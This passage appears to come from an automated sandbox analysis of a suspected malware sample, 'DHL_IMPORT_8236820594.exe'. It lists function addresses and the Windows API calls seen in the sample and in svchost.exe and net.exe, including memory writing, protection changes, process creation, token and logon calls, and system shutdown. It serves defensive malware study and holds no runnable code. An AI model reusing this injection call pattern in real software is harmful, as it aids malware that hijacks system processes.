Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_02ED2D30
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_02ED2D10
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED35C0 NtCreateMutant,LdrInitializeThunk,	5_2_02ED35C0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED39B0 NtGetContextThread,LdrInitializeThunk,	5_2_02ED39B0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2AB0 NtWaitForSingleObject,	5_2_02ED2AB0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2B80 NtQueryInformationFile,	5_2_02ED2B80
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2EA0 NtAdjustPrivilegesToken,	5_2_02ED2EA0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2E30 NtWriteVirtualMemory,	5_2_02ED2E30
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2FA0 NtQuerySection,	5_2_02ED2FA0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2F90 NtProtectVirtualMemory,	5_2_02ED2F90
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2F60 NtCreateProcessEx,	5_2_02ED2F60
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2CF0 NtOpenProcess,	5_2_02ED2CF0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2CC0 NtQueryVirtualMemory,	5_2_02ED2CC0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2C00 NtQueryInformationProcess,	5_2_02ED2C00
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2DB0 NtEnumerateKey,	5_2_02ED2DB0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2D00 NtSetInformationFile,	5_2_02ED2D00
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED3090 NtSetValueKey,	5_2_02ED3090
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED3010 NtOpenDirectoryObject,	5_2_02ED3010
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED3D70 NtOpenThread,	5_2_02ED3D70
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED3D10 NtOpenProcessToken,	5_2_02ED3D10
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004C9400 NtCreateFile,	5_2_004C9400
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004C9560 NtReadFile,	5_2_004C9560
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004C9650 NtDeleteFile,	5_2_004C9650
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004C96F0 NtClose,	5_2_004C96F0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004C9850 NtAllocateVirtualMemory,	5_2_004C9850

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0054D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0054D5EB

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00541201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00541201

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0054E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0054E8F6

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004EBF40	0_2_004EBF40
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00552046	0_2_00552046
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004E8060	0_2_004E8060
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00548298	0_2_00548298
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0051E4FF	0_2_0051E4FF
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0051676B	0_2_0051676B
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00574873	0_2_00574873
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004ECAF0	0_2_004ECAF0
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0050CAA0	0_2_0050CAA0
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004FCC39	0_2_004FCC39
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00516DD9	0_2_00516DD9
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004FB119	0_2_004FB119
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004E91C0	0_2_004E91C0
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00501394	0_2_00501394
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00501706	0_2_00501706
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0050781B	0_2_0050781B
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004F997D	0_2_004F997D
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_004E7920	0_2_004E7920
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_005019B0	0_2_005019B0
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00507A4A	0_2_00507A4A
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00501C77	0_2_00501C77
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00507CA7	0_2_00507CA7
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0056BE44	0_2_0056BE44
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00519EEE	0_2_00519EEE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00501F32	0_2_00501F32
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_033E3628	0_2_033E3628
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418CE3	1_2_00418CE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E863	1_2_0040E863
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004029C0	1_2_004029C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F263	1_2_0042F263
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004032B0	1_2_004032B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004105C3	1_2_004105C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004025FE	1_2_004025FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004105BA	1_2_004105BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402600	1_2_00402600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402E80	1_2_00402E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416F23	1_2_00416F23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004107E3	1_2_004107E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B003E6	1_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA352	1_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC02C0	1_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF41A2	1_2_03AF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B001AA	1_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF81CC	1_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30100	1_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC8158	1_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3C7C0	1_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40770	1_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A64750	1_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5C6E0	1_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B00591	1_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40535	1_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEE4F6	1_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE4420	1_2_03AE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF2446	1_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF6BD7	1_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFAB40	1_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3EA80	1_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A429A0	1_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0A9A6	1_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A56962	1_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A268B8	1_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E8F0	1_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4A840	1_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A42840	1_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ABEFA0	1_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A32FC8	1_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A82F28	1_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A60F30	1_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE2F30	1_2_03AE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB4F40	1_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A52E90	1_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFCE93	1_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFEEDB	1_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFEE26	1_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40E59	1_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A58DBF	1_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3ADE0	1_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4AD00	1_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADCD1F	1_2_03ADCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0CB5	1_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A30CF2	1_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A40C00	1_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A8739A	1_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF132D	1_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2D34C	1_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A452A0	1_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE12ED	1_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5D2F0	1_2_03A5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5B2C0	1_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4B1B0	1_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7516C	1_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2F172	1_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0B16B	1_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF70E9	1_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFF0E0	1_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEF0CC	1_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A470C0	1_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFF7B0	1_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF16CC	1_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A85630	1_2_03A85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADD5B0	1_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B095C3	1_2_03B095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF7571	1_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFF43F	1_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A31460	1_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5FB80	1_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB5BF0	1_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A7DBF9	1_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFB76	1_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADDAAC	1_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A85AA0	1_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE1AA3	1_2_03AE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEDAC6	1_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB3A6C	1_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFA49	1_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF7A46	1_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD5910	1_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A49950	1_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5B950	1_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A438E0	1_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAD800	1_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFFB1	1_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A41F92	1_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A03FD2	1_2_03A03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A03FD5	1_2_03A03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFF09	1_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A49EB0	1_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5FDC0	1_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF7D73	1_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A43D40	1_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF1D5A	1_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFFCF2	1_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB9C32	1_2_03AB9C32
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F202C0	5_2_02F202C0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F40274	5_2_02F40274
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F603E6	5_2_02F603E6
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EAE3F0	5_2_02EAE3F0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5A352	5_2_02F5A352
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E6A33D	5_2_02E6A33D
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F32000	5_2_02F32000
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F581CC	5_2_02F581CC
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F541A2	5_2_02F541A2
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F601AA	5_2_02F601AA
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F28158	5_2_02F28158
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E6A135	5_2_02E6A135
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E90100	5_2_02E90100
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F3A118	5_2_02F3A118
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EBC6E0	5_2_02EBC6E0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E9C7C0	5_2_02E9C7C0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA0770	5_2_02EA0770
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EC4750	5_2_02EC4750
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F4E4F6	5_2_02F4E4F6
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F52446	5_2_02F52446
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F44420	5_2_02F44420
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F60591	5_2_02F60591
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E6A545	5_2_02E6A545
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA0535	5_2_02EA0535
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E9EA80	5_2_02E9EA80
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F56BD7	5_2_02F56BD7
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5AB40	5_2_02F5AB40
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ECE8F0	5_2_02ECE8F0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E868B8	5_2_02E868B8
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA2840	5_2_02EA2840
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EAA840	5_2_02EAA840
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA29A0	5_2_02EA29A0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F6A9A6	5_2_02F6A9A6
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EB6962	5_2_02EB6962
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5EEDB	5_2_02F5EEDB
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5CE93	5_2_02F5CE93
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EB2E90	5_2_02EB2E90
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA0E59	5_2_02EA0E59
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5EE26	5_2_02F5EE26
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E92FC8	5_2_02E92FC8
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F1EFA0	5_2_02F1EFA0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F14F40	5_2_02F14F40
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F42F30	5_2_02F42F30
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EE2F28	5_2_02EE2F28
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EC0F30	5_2_02EC0F30
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E90CF2	5_2_02E90CF2
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F40CB5	5_2_02F40CB5
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA0C00	5_2_02EA0C00
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E9ADE0	5_2_02E9ADE0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EB8DBF	5_2_02EB8DBF
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EAAD00	5_2_02EAAD00
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F3CD1F	5_2_02F3CD1F
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F412ED	5_2_02F412ED
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EBD2F0	5_2_02EBD2F0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EBB2C0	5_2_02EBB2C0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA52A0	5_2_02EA52A0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EE739A	5_2_02EE739A
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E8D34C	5_2_02E8D34C
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5132D	5_2_02F5132D
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5F0E0	5_2_02F5F0E0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F570E9	5_2_02F570E9
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA70C0	5_2_02EA70C0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F4F0CC	5_2_02F4F0CC
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EAB1B0	5_2_02EAB1B0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED516C	5_2_02ED516C
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E8F172	5_2_02E8F172
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F6B16B	5_2_02F6B16B
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F516CC	5_2_02F516CC
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EE5630	5_2_02EE5630
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5F7B0	5_2_02F5F7B0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E91460	5_2_02E91460
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5F43F	5_2_02F5F43F
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F695C3	5_2_02F695C3
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F3D5B0	5_2_02F3D5B0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F57571	5_2_02F57571
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F4DAC6	5_2_02F4DAC6
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EE5AA0	5_2_02EE5AA0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F41AA3	5_2_02F41AA3
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F3DAAC	5_2_02F3DAAC
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F13A6C	5_2_02F13A6C
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F57A46	5_2_02F57A46
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5FA49	5_2_02F5FA49
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F15BF0	5_2_02F15BF0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EDDBF9	5_2_02EDDBF9
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EBFB80	5_2_02EBFB80
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5FB76	5_2_02F5FB76
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA38E0	5_2_02EA38E0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F0D800	5_2_02F0D800
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA9950	5_2_02EA9950
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EBB950	5_2_02EBB950
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F35910	5_2_02F35910
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA9EB0	5_2_02EA9EB0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E63FD5	5_2_02E63FD5
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02E63FD2	5_2_02E63FD2
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5FFB1	5_2_02F5FFB1
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA1F92	5_2_02EA1F92
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5FF09	5_2_02F5FF09
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F5FCF2	5_2_02F5FCF2
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F19C32	5_2_02F19C32
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EBFDC0	5_2_02EBFDC0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F57D73	5_2_02F57D73
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02EA3D40	5_2_02EA3D40
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02F51D5A	5_2_02F51D5A
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004B2140	5_2_004B2140
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AD087	5_2_004AD087
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AD090	5_2_004AD090
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AD2B0	5_2_004AD2B0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004AB330	5_2_004AB330
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004B57B0	5_2_004B57B0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004B39F0	5_2_004B39F0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004CBD30	5_2_004CBD30
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_00B4E314	5_2_00B4E314
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_00B4E433	5_2_00B4E433
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_00B4E7D2	5_2_00B4E7D2
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_00B4D898	5_2_00B4D898
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_00B4CB38	5_2_00B4CB38

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 58 times
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: String function: 004FF9F2 appears 31 times
